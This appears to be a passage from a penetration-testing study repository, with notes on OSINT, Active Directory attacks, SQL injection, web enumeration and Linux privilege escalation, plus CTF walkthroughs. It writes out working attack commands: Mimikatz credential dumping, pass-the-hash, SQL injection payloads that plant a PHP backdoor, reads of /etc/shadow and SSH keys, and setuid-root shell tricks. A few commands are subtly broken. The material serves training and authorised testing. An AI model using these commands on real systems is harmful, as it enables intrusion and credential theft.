HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer 112 | reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer 113 | ``` 114 | 115 | ## Automated tools 116 | 117 | ``` 118 | winPEAS.exe 119 | PowerUp.ps1 120 | windows-exploit-suggester.py 121 | Metasploit - post/multi/recon/local_exploit_suggester 122 | ``` 123 | 124 | ### windows-exploit-suggester.py 125 | 126 | * Run `systeminfo` and save the output into a text document 127 | * Update the database - `./windows-exploit-suggester.py --update` 128 | * .`/windows-exploit-suggester.py --database DBNameHere --systeminfo filepath.txt` 129 | 130 | ### Metasploit exploit suggester 131 | 132 | * Background session `background` 133 | * Select exploit to use 134 | * Set Session 135 | * Set LHOST and LPORT 136 | * Run 137 | -------------------------------------------------------------------------------- /1.-reconnaissance-osint/cewl.md: -------------------------------------------------------------------------------- 1 | # OSINT tools 2 | 3 | ### CeWL 4 | 5 | * Ruby tool that spiders websites and generates wordlists for use in dictionary attacks. 6 | * [https://github.com/digininja/CeWL](https://github.com/digininja/CeWL) (included in Kali) 7 | 8 | ``` 9 | cewl [options] 10 | Example: cewl -m 6 -w megacorp-cewl.txt www.megacorpone.com 11 | -d = depth to spider, default 2 12 | -m = minimum word length, default 3 13 | -w = write the output to file, include file name 14 | -c = count, show word count for each word entry 15 | -v = verbose 16 | ``` 17 | 18 | ### FOCA 19 | 20 | * Metadata search tool that can search, download and analyze all documents on a domain and provide a list of metadata 21 | * Metadata often includes users, directories, printers, emails, passwords, operating systems/software and servers 22 | * [https://github.com/ElevenPaths/FOCA](https://github.com/ElevenPaths/FOCA) 23 | 24 | ### Hunter 25 | 26 | * From the site: "Hunter lets you find professional email addresses in seconds and connect with the people that matter for your business." 27 | * [https://hunter.io/](https://hunter.io/) 28 | 29 | ### Netcraft 30 | 31 | * Provides various functions including DNS information and technologies being used on a site. 32 | * [https://www.netcraft.com/tools/#internet-research](https://www.netcraft.com/tools/#internet-research) 33 | 34 | ### OSINT framework 35 | 36 | * Massive directory of OSINT tools arranged by function 37 | * [https://osintframework.com](https://osintframework.com) 38 | 39 | ### Phonebook.cz 40 | 41 | * Lists all domains, email addresses, and URLs associated with a domain. 42 | * [https://phonebook.cz/](https://phonebook.cz/) 43 | 44 | ### Recon-ng 45 | 46 | * Module based framework for web information gathering 47 | * Run tool (Kali): `recon-ng` 48 | * Search available modules: `marketplace search $keyword` 49 | * Learn about available modules: `marketplace info $modulename` 50 | * Add a module: `marketplace install module` 51 | * Load module: `modules load $modulename` 52 | * Display required parameters: `info` 53 | * Configure options: `options set $option` 54 | * Execute module: `run` 55 | * Information from each module used is stored in a database 56 | * Exit module: `back` 57 | * Display information: `show` 58 | 59 | ### Shodan 60 | 61 | * Allows searching for computers and IoT devices 62 | * May reveal items that should be in scope but were not included by the client 63 | * Search by client name; devices outside the client's IP range are likely managed by third parties 64 | * [https://www.shodan.io/](https://www.shodan.io/) 65 | 66 | ### Social media tools 67 | 68 | * [Social-Searcher](https://www.social-searcher.com/) - a search engine for social media sites 69 | * [Twofi](https://www.kali.org/tools/twofi/) - scans a user's Twitter feed and generates wordlists 70 | * [linkedin2username](https://github.com/initstring/linkedin2username) - a script for generating username lists based on LinkedIn data 71 | 72 | ### TheHarvester 73 | 74 | * Gathers emails, names, subdomains, IP addresses, and URLs from multiple search engines 75 | * Run with (Kali): `Theharvester -d cisco.com -b google` 76 | * \-d: specifies the target domain 77 | * \-b: specifies which data source to search 78 | 79 | ### whois enumeration 80 | 81 | * Regular lookup: `whois somesite.com` 82 | * Reverse lookup: `whois $ipaddress` 83 | -------------------------------------------------------------------------------- /4.-exploitation/active-directory.md: -------------------------------------------------------------------------------- 1 | # Active Directory 2 | 3 | When testing active directory our goals should be to: 4 | 5 | * gain a foothold on a machine on the domain and elevate our privileges 6 | * enumerate the domain to find additional accounts, users, etc. that ideally increase our privilege level on the domain 7 | * gain access to the domain controller 8 | * persist on the domain (situation dependent) 9 | 10 | Assuming that we've already [enumerated](../3.-enumeration/active-directory.md) the domain, we should now be focused on gathering credentials to move laterally within the domain. 11 | 12 | ### Cached credential retrieval 13 | 14 | Once you have local admin privileges on a domain joined computer you can dump the credentials stored in LSASS and the SAM database. 15 | 16 | #### Mimikatz 17 | 18 | ``` 19 | mimikatz.exe 20 | privilege::debug 21 | sekurlsa::logonpasswords (dump lsass) 22 | lsadump::sam (dump sam database) 23 | sekurlsa::tickets (to dump tickets stored in memory) 24 | kerberos::list (view cached kerberos tickets for the current user) 25 | ``` 26 | 27 | ### Attacks 28 | 29 | #### Kerberoasting 30 | 31 | If we find interesting service accounts while enumerating we can export the Kerberos 5 etype 23 hash for offline cracking. 32 | 33 | ``` 34 | Extracting SPN hashes 35 | crackmapexec ldap $ldapIPaddress -u user -p pass --kerberoasting output.txt 36 | kerberos::list /export 37 | 38 | Crack 39 | john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 40 | hashcat -m 13100 hash.txt /path/to/wordlist -o output.txt 41 | ``` 42 | 43 | Alternatively, we can use the **Invoke-Kerberoast.ps1,** to enumerate SPNs, request tickets, and export them in a format ready for cracking. 44 | 45 | #### AS-REP Roasting 46 | 47 | The AS-REP roasting attack attempts to retrieve the Kerberos hash of users that don't require Kerberos pre-authentication. 48 | 49 | ``` 50 | Searching for AS-REP Roastable users 51 | crackmapexec ldap $ldapIPaddress -u user -p 'pass' --asreproast output.txt 52 | GetNPUsers.py domain/user:pass -dc-ip ipaddress -request format john -output.txt 53 | 54 | Crack 55 | john --format:krb5asrep output.txt 56 | hashcat -m 18200 hash.txt /path/to/wordlist -o output.txt 57 | ``` 58 | 59 | #### Unconstrained delegation 60 | 61 | 62 | 63 | #### Constrained delegataion 64 | 65 | 66 | 67 | #### DCSync 68 | 69 | ### Lateral movement 70 | 71 | Moving laterally within a domain is fairly straightforward once you have credentials. 72 | 73 | #### Windows remote management 74 | 75 | ``` 76 | winrs -remote:hostname -u:username -p:password (command) 77 | ``` 78 | 79 | #### PS-Remoting 80 | 81 | \*\* 82 | 83 | #### PS-EXEC 84 | 85 | ``` 86 | psexec.py domain/user:password@ipaddress 87 | ``` 88 | 89 | #### SMB-EXEC 90 | 91 | ``` 92 | smbexec.py username:password@ipaddress 93 | ``` 94 | 95 | #### Pass the hash 96 | 97 | Pass the hash allows attackers to authenticate to a remote system using an NTLM hash. 98 | 99 | {% hint style="info" %} 100 | Many PTH tools require both the LM and NTLM hash as part of the command. If the LM hash is not available you can use a string of 32 zeros in its place. 101 | {% endhint %} 102 | 103 | ``` 104 | Passing-the-hash Toolkit 105 | pth-winexe -U Administrator%$LMHash:$NTLMHash //$ipaddress cmd 106 | 107 | Mimikatz 108 | privilege::debug 109 | sekurlsa::pth /user:Administrator /domain:test.local /ntlm:$hash 110 | 111 | SMBclient 112 | smbclient.py -hashes LMHash:NTLMHash domain/user@$ipaddress 113 | 114 | PS Exec 115 | psexec.py -hashes :NTLMhash administrator@ipaddress 116 | ``` 117 | 118 | #### Overpass the hash 119 | 120 | The overpass the hash technique utilizes the NTLM hash to obtain a Kerberos ticket, thus avoiding NTLM authentication. 121 | 122 | #### Pass the ticket 123 | 124 | 125 | 126 | ### Persistence 127 | 128 | #### Golden tickets 129 | -------------------------------------------------------------------------------- /source-zero-con-references.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Thanks for watching! 3 | --- 4 | 5 | # Source Zero Con References 6 | 7 | ### Training 8 | 9 | #### Books 10 | 11 | Engebretson, Patrick. (2013) The Basics of Hacking and Penetration Testing. Syngress. 12 | 13 | OccupyTheWeb. (2019) Linux Basics For Hackers: Getting Started with Networking, Scripting, and Security in Kali. No Starch Press. 14 | 15 | Weidman, Georgia. (2014) Penetration Testing: A Hands-On Introduction to Hacking. No Starch Press. 16 | 17 | #### Courses 18 | 19 | The Cyber Mentor. (2023, January). Practical Ethical Hacking – 15 Hrs \[video]. Youtube. [https://www.youtube.com/watch? v=3FNYvj2U0HM\&lc=UgwWx\_P1fsJGXFhwLfd4AaABAg](https://www.youtube.com/watch?v=3FNYvj2U0HM\&lc=UgwWx_P1fsJGXFhwLfd4AaABAg). (FREE!) 20 | 21 | TCM Academy. Practical Network Penetration Tester. [https://certifications.tcm-sec.com/pnpt/ ](https://certifications.tcm-sec.com/pnpt/) 22 | 23 | CompTIA. Multiple Certifications (Security+, Network+, Pentest+). [https://www.comptia.org/training/by-certification ](https://www.comptia.org/training/by-certification) 24 | 25 | Offensive Security. Fundamentals (100-level) and Multiple Certifications. [https://www.offsec.com/courses-and-certifications/](https://www.offsec.com/courses-and-certifications/) 26 | 27 | SANS. Several Penetration Testing Courses (Offensive Operations Learning Path). [https://www.sans.org/cyber-security-skills-roadmap/?msc=main-nav](https://www.sans.org/cyber-security-skills-roadmap/?msc=main-nav) 28 | 29 | TryHackMe. Jr. Penetration Tester and Offensive Pentesting Learning Paths. [https://tryhackme.com/hacktivities ](https://tryhackme.com/hacktivities) 30 | 31 | HacktheBox. Numerous Learning Paths Including Certified Penetration Testing Specialist. [https://academy.hackthebox.com/#pills-job-role-paths-tab](https://academy.hackthebox.com/#pills-job-role-paths-tab) 32 | 33 | ### Certifications 34 | 35 | #### Entry Level 36 | 37 | Certified Penetration Testing Certification (CPTS). [https://academy.hackthebox.com/preview/certifications/htb-certified-penetration-testing-specialist](https://academy.hackthebox.com/preview/certifications/htb-certified-penetration-testing-specialist) 38 | 39 | Junior Penetration Tester (eJPT). [https://info.ine.com/ejpt/](https://info.ine.com/ejpt/) 40 | 41 | GIAC Penetration Tester Certification (GPEN). [https://www.giac.org/certifications/penetration-tester-gpen/](https://www.giac.org/certifications/penetration-tester-gpen/) 42 | 43 | Offensive Security Certified Professional (OSCP). [https://www.offsec.com/courses/pen-200/](https://www.offsec.com/courses/pen-200/) 44 | 45 | CompTIA Pentest+. [https://www.comptia.org/certifications/pentest](https://www.comptia.org/certifications/pentest) 46 | 47 | Practical Network Penetration Tester (PNPT). [https://certifications.tcm-sec.com/pnpt/](https://certifications.tcm-sec.com/pnpt/) 48 | 49 | #### Intermediate 50 | 51 | Certified Red Team Operator (CRTO). [https://training.zeropointsecurity.co.uk/courses/red-team-ops](https://training.zeropointsecurity.co.uk/courses/red-team-ops) 52 | 53 | GIAC Exploit Researcher and Advanced Penetration Tester (GXPN). [https://www.giac.org/certifications/exploit-researcher-advanced-penetration-tester-gxpn/](https://www.giac.org/certifications/exploit-researcher-advanced-penetration-tester-gxpn/) 54 | 55 | Offensive Security Experienced Pentester (OSEP). [https://www.offsec.com/courses/pen-300/](https://www.offsec.com/courses/pen-300/) 56 | 57 | ### Experience 58 | 59 | HackTheBox. [https://www.hackthebox.com/](https://www.hackthebox.com/). 60 | 61 | OSCP-Like Hack The Box Machines. [https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159](https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159) 62 | 63 | Proving Grounds (Offsec). [https://www.offsec.com/labs/](https://www.offsec.com/labs/) 64 | 65 | TryHackMe. [https://tryhackme.com. ](https://tryhackme.com) 66 | -------------------------------------------------------------------------------- /4.-exploitation/web-application-attacks/sql-injection.md: -------------------------------------------------------------------------------- 1 | # SQL injection 2 | 3 | SQL injection is a common vulnerability that enables attackers to inject commands and interact with databases. While typically exploited for data leakage, SQL vulnerabilities can also lead to server compromise. 4 | 5 | #### Detection 6 | 7 | The first step is to find input fields on the target site that likely interact with databases, such as login field, search fields, message threads, etc. We can use a single quote (') to check for potential vulnerabilities. Ideally, this will cause an error and we'll receive an indication from the server. 8 | 9 | #### Authentication bypass 10 | 11 | In normal operation we expect a login form to query the database, something like: 12 | 13 | ``` 14 | select * from users where name = 'admin' and password = 'password123'; 15 | ``` 16 | 17 | We can manipulate the input to change how the command is processed by the database: 18 | 19 | ``` 20 | admin' or 1=1;# 21 | admin' or 1=1 LIMIT 1;# 22 | ``` 23 | 24 | Which results in query modification: 25 | 26 | ``` 27 | select * from users where name = 'admin' or 1=1;#' and password = 'password123'; 28 | ``` 29 | 30 | The introduction of the single quote before the password entry removes the remainder of the statement. If this causes errors, we can also request a fixed number of returns using the LIMIT statement. 31 | 32 | ``` 33 | select * from users where name = 'admin' or 1=1 LIMIT 1;# 34 | ``` 35 | 36 | To replicate in a web application, we submit the following payload into a username field: 37 | 38 | ``` 39 | tom' or 1=1 LIMIT 1;# 40 | ``` 41 | 42 | This should result in an authenticated session login. 43 | 44 | #### Enumerating Databases 45 | 46 | ``` 47 | http://10.14.1.23/test.php?id=1' - begin testing with single quote 48 | http://10.14.1.23/test.php?id=1 order by 1 - attempt to sort by first column 49 | ``` 50 | 51 | If this is successful and we receive the name of column, we can continue to increase the number until we receive an error. This can be performed manually or automated in BurpSuite Repeater. 52 | 53 | Next we can extract row information using the UNION statement. 54 | 55 | ``` 56 | http://10.14.1.23/test.php?id=1 union all select 1, 2, 3, 4 57 | ``` 58 | 59 | Depending on how the information is displayed, we can then modify our input to extract more information. In the following example we've identified that the column three falls in a logical spot on the page. 60 | 61 | ``` 62 | http://10.14.1.23/test.php?id=1 union all select 1, 2, @@version 63 | http://10.14.1.23/test.php?id=1 union all select 1, 2, user() 64 | http://10.14.1.23/test.php?id=1 union all select 1, 2, table_name from information_schema.tables 65 | http://10.14.1.23/test.php?id=1 union all select 1, 2, column_name from information_schema.columns where table_name='users' 66 | http://10.14.1.23/test.php?id=1 union all select 1, username, password from users 67 | ``` 68 | 69 | #### Code Execution 70 | 71 | In some cases we can use SQL injection to read/write system files and possibly write PHP onto the system for execution. 72 | 73 | ``` 74 | http://10.14.1.23/test.php?id=1 union all select 1, 2, load_file('C://Windows/System32/drivers/etc/hosts') 75 | ``` 76 | 77 | If this is successful we can attempt to create a malicious file on the server. 78 | 79 | ``` 80 | http://10.14.1.23/test.php?id=1 union all select 1, 2, "" into OUTFILE 'c:/xampp/htdocs/backdoor.php' 81 | ``` 82 | 83 | We may then be able to access the file with a command. 84 | 85 | ``` 86 | http://10.14.1.23/backdoor.php?cmd=id 87 | ``` 88 | 89 | If this succeeds, we can expand access by installing a full php shell on the server. 90 | 91 | #### SQLmap 92 | 93 | Tools such as SQLmap simplify the extraction of information from databases. 94 | 95 | ``` 96 | sqlmap -u http://10.14.1.23/test.php?id=1 -p "id" 97 | sqlmap -u http://10.14.1.23/test.php?id=1 -p "id" --dbms=mysql --dump 98 | ``` 99 | 100 | SQLmap also has numerous other features including firewall bypass and attempting to gain a shell on the target system. 101 | 102 | ``` 103 | sqlmap -u http://10.14.1.23/test.php?id=1 -p "id" --dbms=mysql --os-shell 104 | ``` 105 | -------------------------------------------------------------------------------- /3.-enumeration/80-443-http-s.md: -------------------------------------------------------------------------------- 1 | # 80/443 - HTTP(s) 2 | 3 | Web applications often contain vulnerabilities due to a large attack surface reliant on multiple technologies, dependencies and configuration challenges. Thorough enumeration is critical to ensure a thorough understanding of the attack surface. 4 | 5 | ## Enumeration process 6 | 7 | ### 1. Manual review 8 | 9 | * Set up a proxy interceptor (BurpSuite or ZAP) to passively audit 10 | * Identify links, input fields, login pages, etc. 11 | * Note version or software information 12 | * Inspect the page source, look for version info, comments, etc. 13 | * Inspect URLs for file extensions (php, jsp, do, html, etc.) 14 | * Inspect URLs for possible bypass vulnerabilities 15 | * Check for and review sitemaps/robots.txt/security.txt 16 | * Check HTTP headers, observe how the web page and server exchange information 17 | 18 | ### 2. Scan for vulnerabilities 19 | 20 | * Utilize scanning tools to crawl web pages and audit for vulnerabilities 21 | * Manually review scan results 22 | 23 | ``` 24 | nikto -h 10.11.1.5 25 | BurpSuite Pro active/live scan 26 | ZAP active scan 27 | Nessus web application scan 28 | ``` 29 | 30 | ### 3. Identify underlying server technologies 31 | 32 | * Web applications often utilize a number of underlying components that are typically outdated (examples: jQuery, Bootstrap, Telerik, etc.) 33 | * Use [nMap ](../2.-scanning/port-scanning-with-nmap.md)to identify technologies operating on ports other than 80/443 34 | * Attempt to identify: 35 | * Programming languages and frameworks 36 | * Web server software 37 | * Database software 38 | * Server operating system 39 | * Default pages and configuration files will often be identified by vulnerability scanners or through scanning for open directories 40 | * [WhatWeb](https://github.com/urbanadventurer/WhatWeb) - Tool with over 1,800 plugins designed to help identify website technologies. 41 | * [Wappalyzer](https://www.wappalyzer.com/) - Webiste and plugin for recognizing website technologies. 42 | 43 | ### 4. Scan for open directories 44 | 45 | Scanning for open directories is often called forced browsing. This technique uses a wordlist to search for unlinked directory and file names on the target. 46 | 47 | Tools that automate this process should be configured to look for filetypes based on what you know about the web server. 48 | 49 | ``` 50 | Microsoft IIS - .asp or .aspx (+ html) 51 | Apache - .php (+ html) 52 | Tomcat - .war (+ html) 53 | other - .pdf, .doc, .xls, .xlsx, .ppt, .pptx 54 | ``` 55 | 56 | #### Directory busting methodology (order of precedence) 57 | 58 | ``` 59 | .php OR .asp, .aspx AND .html AND .txt 60 | .doc, .docx, .xls, .pdf 61 | .webconfig, .config, .json, .yml, .env 62 | .bk, .bak, .swp 63 | .zip, .log 64 | ``` 65 | 66 | #### The following tools (and others) all have similar forced browsing functionality. 67 | 68 | #### Dirsearch 69 | 70 | ``` 71 | python3 dirsearch.py -u http://10.10.87.202 -e html,asp,aspx -x 401,402,403 72 | 73 | -e: extensions to include 74 | -x: status codes to exclude 75 | -f: forces the addition of extensions on every wordlist entry 76 | -w: wordlist 77 | ``` 78 | 79 | #### Dirb 80 | 81 | ``` 82 | dirb $ipaddress 83 | -X filetype : searches for specific files 84 | ``` 85 | 86 | #### ffuf 87 | 88 | ``` 89 | ffuf -w wordlist.txt -u http://somesite.com/FUZZ 90 | ffuf -w wordlist.txt -u http://somesite.com/FUZZ -e .aspx,.html,.php,.txt 91 | ffuf -w wordlist.txt -u http://somesite.com -H "Host: FUZZ.somesite.com" 92 | ``` 93 | 94 | #### BurpSuite 95 | 96 | ``` 97 | On 'Target' tab, Right click target site --> Engagement tools --> Discover content 98 | ``` 99 | 100 | ### 5. Finally, review and test interesting items 101 | 102 | * Test input fields for XSS and SQL injection 103 | * Test login forms for weak authentication, default/weak credentials, and SQL injection 104 | * Test URL parameters for local/remote file inclusion 105 | * Test URLs for directory traversal 106 | * Review identified components for known vulnerabilities 107 | 108 | ## Testing SSL 109 | 110 | #### Nmap scripting engine 111 | 112 | ``` 113 | nmap -p 443 --script=ssl-enum-ciphers www.somesite.org 114 | ``` 115 | 116 | #### SSLscan 117 | 118 | ``` 119 | sslscan IP_ADDRESS: 120 | ``` 121 | 122 | #### Qualys SSL labs 123 | 124 | {% embed url="https://www.ssllabs.com/ssltest/" %} 125 | -------------------------------------------------------------------------------- /5.-maintaining-access/linux-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | # Linux privilege escalation 2 | 3 | ## Manual enumeration 4 | 5 | ### User 6 | 7 | ``` 8 | whoami 9 | id 10 | history 11 | ``` 12 | 13 | ### Other Users 14 | 15 | ``` 16 | cat /etc/passwd 17 | who 18 | ``` 19 | 20 | ### Privileges 21 | 22 | ``` 23 | sudo -l 24 | cat /etc/sudoers 25 | ``` 26 | 27 | ### File system 28 | 29 | ``` 30 | pwd (current location) 31 | echo $PATH 32 | ``` 33 | 34 | ### Hostname 35 | 36 | ``` 37 | hostname 38 | ``` 39 | 40 | ### OS and architecture 41 | 42 | ``` 43 | cat /etc/issue 44 | cat /etc/*-release 45 | uname -a 46 | lscpu 47 | ``` 48 | 49 | ### Processes and services 50 | 51 | ``` 52 | ps aux 53 | ``` 54 | 55 | ### Network 56 | 57 | ``` 58 | ifconfig OR ip a (interfaces) 59 | route OR route l (routing table) 60 | netstat -anp OR ss -anp (active connections) 61 | arp -a 62 | ``` 63 | 64 | ### Scheduled tasks 65 | 66 | ``` 67 | ls -lah /etc/cron* (contents of all cron files) 68 | cat /etc/crontab (admins often add jobs here, usually run w/ root privs) 69 | cat var/log/cron.log (inspect for running cron jobs) 70 | ``` 71 | 72 | ### Applications/patch levels/drivers/kernel modules 73 | 74 | ``` 75 | dpkg -l 76 | lsmod (lists all kernel modules loaded) 77 | /sbin/modinfo $modulename (more info on specific kernel modules - libata in this example) 78 | ``` 79 | 80 | ### Readable/writeable directories 81 | 82 | ``` 83 | find / -writeable -type d 2>/dev/null 84 | ``` 85 | 86 | ### Unmounted disks 87 | 88 | ``` 89 | mount 90 | cat /etc/fstab (drives mounted at boot) 91 | lsblk (all available disks) 92 | ``` 93 | 94 | ### Sensitive files 95 | 96 | ``` 97 | history 98 | cat /etc/passwd 99 | cat /etc/shadow 100 | cat /etc/group 101 | ``` 102 | 103 | ### Passwords 104 | 105 | Search the file system for passwords. Try additional search terms (pass, etc.). 106 | 107 | ``` 108 | grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null 109 | ``` 110 | 111 | ### SSH keys 112 | 113 | Search the filesystem for SSH keys. Public keys are typically stored in the "authorized\_keys" folder, private keys are stored as "id\_rsa". 114 | 115 | ``` 116 | find / -name id_rsa* 2> /dev/null 117 | find / -name authorized_keys* 2> /dev/null 118 | ``` 119 | 120 | ## Automated tools 121 | 122 | ``` 123 | LinPeas.sh 124 | LinEnum.sh 125 | Linux Exploit Suggester 126 | LinuxPrivChecker.py 127 | ``` 128 | 129 | ## Exploitation paths 130 | 131 | ### SUID Files 132 | 133 | SUID files allow individuals to execute files using the privileges of another user. They are identifiable by an "s" in the third character of the root permissions for a file. You can search manually with: 134 | 135 | ``` 136 | find / -perm -u=s -type f 2>/dev/null 137 | ``` 138 | 139 | If you find identify a SUID file, check [GTFO bins](https://gtfobins.github.io/) for exploits 140 | 141 | ### Capabilities 142 | 143 | The exploitation for capabilities is similar to that of SUID files. Search for capabilities with: 144 | 145 | ``` 146 | getcap -r / 2>/dev/null 147 | ``` 148 | 149 | Look for "+ep" at the end of any returned items. If present, exploitation possible. 150 | 151 | ### Execution 152 | 153 | Run Python to escalate 154 | 155 | ``` 156 | /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash") 157 | ``` 158 | 159 | Other possibly exploitable capabilities include perl, tar, openssl (check [GTFO bins](https://gtfobins.github.io/)) 160 | 161 | ### Scheduled Tasks 162 | 163 | ``` 164 | cat /etc/cron* 165 | cat /etc/crontab (admins often add jobs here, usually run w/ root privs) 166 | cat var/log/cron.log (inspect for running cron jobs) 167 | systemctl list-timers --all 168 | ``` 169 | 170 | Columns represent minute, hour, day of month, month, day of week. Asterisks in columns indicate "all", asterisks in all fields indicates that the task runs every minute/hour/day of month/month/day of week 171 | 172 | #### Exploitation 173 | 174 | First, check the file type using the `file` command and whether or not you have write access. Sometimes replacing the file with one created on your attacking machine is easier than modifying the file that is in place. If so, rename the current file as \*.old and use wget to replace with the version created on your attack machine. 175 | 176 | ``` 177 | echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > script 178 | **Wait for the job to execute, then 179 | /tmp/bash -p 180 | ``` 181 | 182 | ### NFS root squashing 183 | 184 | Check `cat /etc/exports` for results indicating "no\_root\_squash", indicating folders that are shareable and can be mounted. If available, remote commands are executed as root. 185 | 186 | #### Exploitation 187 | 188 | From the attacking machine: 189 | 190 | Search for mountable shares 191 | 192 | ``` 193 | showmount -e ipaddress 194 | ``` 195 | 196 | Create a new directory: 197 | 198 | ``` 199 | mkdir /tmp/mntme 200 | ``` 201 | 202 | Mount the folder: 203 | 204 | ``` 205 | mount -o rw, vers=2 ipaddress:/tmp /tmp/mountme 206 | ``` 207 | 208 | Create malicious file: 209 | 210 | ``` 211 | echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; /tmp/mountme/x.c 212 | ``` 213 | 214 | Compile the file: 215 | 216 | ``` 217 | gcc /tmp/mountme/x.c -o /tmp/mountme/x 218 | ``` 219 | 220 | Return to the victim machine, navigate to the target directory (/tmp), and execute the file 221 | 222 | ``` 223 | ./x 224 | ``` 225 | 226 | ### Docker 227 | 228 | If you are in the Docker group, check to see which containers are available: 229 | 230 | ``` 231 | docker image ls 232 | ``` 233 | 234 | Run the image: 235 | 236 | ``` 237 | docker run -v /:/mnt --rm -it alpine chroot /mnt sh 238 | ``` 239 | -------------------------------------------------------------------------------- /7.-walkthroughs/htb-blunder.md: -------------------------------------------------------------------------------- 1 | # HTB - Blunder 2 | 3 | ![](<../.gitbook/assets/image (1).png>) 4 | 5 | This writeup examines the Blunder machine from Hack the Box. This machine reinforces the value of deep enumeration and is great when preparing for various certification exams. 6 | 7 | ### Scanning and enumeration 8 | 9 | We start by scanning the machine with Nmap to identify open ports. Our scan reveals two ports: FTP on port 21 (closed), and an HTTP server operating on port 80. We immediately proceed to enumerating the web server; however, we also start a UDP scan to be sure that we aren’t missing any other possible attack vectors (update: no UDP ports open). 10 | 11 | Next, we manually view the page to look for information and check hyperlinks. The page is a simple blog that contains a few articles. The page also has a link for an “about” page and the “created by” link in the footer links to a Twitter profile.![](https://oncyberwar.com/wp-content/uploads/2021/01/image-18.png) 12 | 13 | Next, we move on to scanning and directory busting. Nikto reveals the robots.txt and the presence of /admin/config.php. By navigating to the page discover a ‘BLUDIT’ login page.![](https://oncyberwar.com/wp-content/uploads/2021/01/image-19.png) 14 | 15 | A quick web search for BLUDIT suggests there is an RCE exploit available, but it requires login credentials—we’ll return to this later. 16 | 17 | Basic credential guesses aren’t successful so we continue with more through directory busting. Much like the Haircut machine, this machine reminds us of the importance of thorough directory busting. Running dirsearch a second time to search for txt and pdf files provides an additional clue: ‘/todo.txt.’![](https://oncyberwar.com/wp-content/uploads/2021/01/image-20.png) 18 | 19 | Navigating to the document we learn that the root of the page (as suspected) is a CMS. The bottom note is also interesting, as it suggests a possible username beyond the seemingly unrelated Twitter page. With this information we may be able to brute force the login. 20 | 21 | Brute forcing can be a bit of an art, but its always worthwhile to fully understand how the web page is sending login requests to the server. For this we use a proxy interceptor (Burp Suite, ZAP, etc.).![](https://oncyberwar.com/wp-content/uploads/2021/01/image-21.png) 22 | 23 | Reviewing the request in Burp Suite we find that the login attempt is made via POST, but more importantly we identify that the request is accompanied by a CSRF token. After some experimentation it appears this CSRF token is used by BLUDIT to temporarily lockout accounts after 10 failed login attempts. A quick Google search identified [this](https://rastating.github.io/bludit-brute-force-mitigation-bypass/) article, which includes a POC for bypassing this protection. The POC requires modification to import external wordlists; however, after a couple attempts I had a working brute force tool that bypassed the lockout. 24 | 25 | **Modified tool:** [https://github.com/sourtimez/Bludit-CMS-Brute-Force-Mitigation-Bypass](https://github.com/sourtimez/Bludit-CMS-Brute-Force-Mitigation-Bypass) 26 | 27 | Despite the working tool our brute force attempt is unsuccessful. Perhaps the answer is contained within the content of the CMS? To check, we use a tool called CeWL to generate a custom wordlist from the contents of the page. (\*\*IMO this is a bit unrealistic for a CMS with only three articles, but may be useful for larger corporate websites so there is still a valuable lesson to learn\*\*) 28 | 29 | ``` 30 | cewl -m 4 http://10.10.10.191 -w wordlist.txt 31 | ``` 32 | 33 | Using this wordlist we find a matching password. 34 | 35 | ### Establishing a foothold 36 | 37 | Next, we return to the previously identified Bludit RCE located at [https://www.exploit-db.com/exploits/48701](https://www.exploit-db.com/exploits/48701) 38 | 39 | To launch the exploit, we download and modify the necessary portions of the exploit code, paying careful attention to create the required .png and .htaccess files. After launching the exploit we receive confirmation of successful uploads. 40 | 41 | Finally, we start a netcat listener to catch our shell and navigate to the target page (identified in the exploit code). Success, we have a shell! 42 | 43 | ### Privilege escalation 44 | 45 | Our initial shell is somewhat limited and despite several attempts I am unable to upgrade. Instead, I opt to configure a [better php reverse shell](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php) and upload it to /var/www/bludit-3.9.2/reverse.php with `wget`. Navigating to the folder in our restricted shell confirms the upload was successful. 46 | 47 | To launch the newly uploaded shell start another netcat listener and navigate to the appropriate URL in the browser. 48 | 49 | With a stable shell we can now upgrade to TTY using python and enable tab autocompletion. 50 | 51 | ``` 52 | python -c "import pty; pty.spawn('/bin/bash')" 53 | ``` 54 | 55 | Next, we move on to looking for privilege escalation opportunities. Nothing stands out from our basic search commands so we upload and run [LinPeas.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS). Nothing stands out in our LinPeas scan so we continue with more in depth manual enumeration. The following command searches for passwords and provides color coded output of the results: 56 | 57 | ``` 58 | grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null 59 | ``` 60 | 61 | Scrolling through the results (there are a lot!) we identify several hashes located in the Bludit directory. These hashes are present in the ‘users.php’ file for both installed versions of Bludit. Of note, /var/www/bludit-3.10.0a/bl-content/databases/users.php contains the following: 62 | 63 | Entering the hash on [Crackstation.net](https://crackstation.net/) reveals that Hugo’s bludit password is ‘**Password120**.’ Fortunately, this user also reused this password and we pivot to the account with `su hugo`. (There are also hashes for fergus and the admin user; however, there are not matches available in Crackstation for these additional hashes).![](https://oncyberwar.com/wp-content/uploads/2021/01/image-28.png) 64 | 65 | After recovering the user.txt flag from home/hugo, we begin enumerating the account . `sudo -l` indicates some privileges, and through a quick Google search we find that the version of sudo installed on the target has an available PE exploit. This exploit works by "tricking" sudo into executing /bin/bash as root with `sudo -u#-1 /bin/bash`. You can read more about this vulnerability [here](https://www.exploit-db.com/exploits/47502): 66 | 67 | The root.txt in the /root folder. 68 | -------------------------------------------------------------------------------- /7.-walkthroughs/thm-hackpark.md: -------------------------------------------------------------------------------- 1 | # THM -HackPark 2 | 3 | ![](<../.gitbook/assets/image (5).png>) 4 | 5 | This walkthrough describes my approach to the 'Hackpark' room on TryHackMe. This room was more challenging than anticipated and required outside the box thinking to complete. 6 | 7 | ### **Scanning and enumeration** 8 | 9 | Like usual I began this machine by executing an Nmap scan. 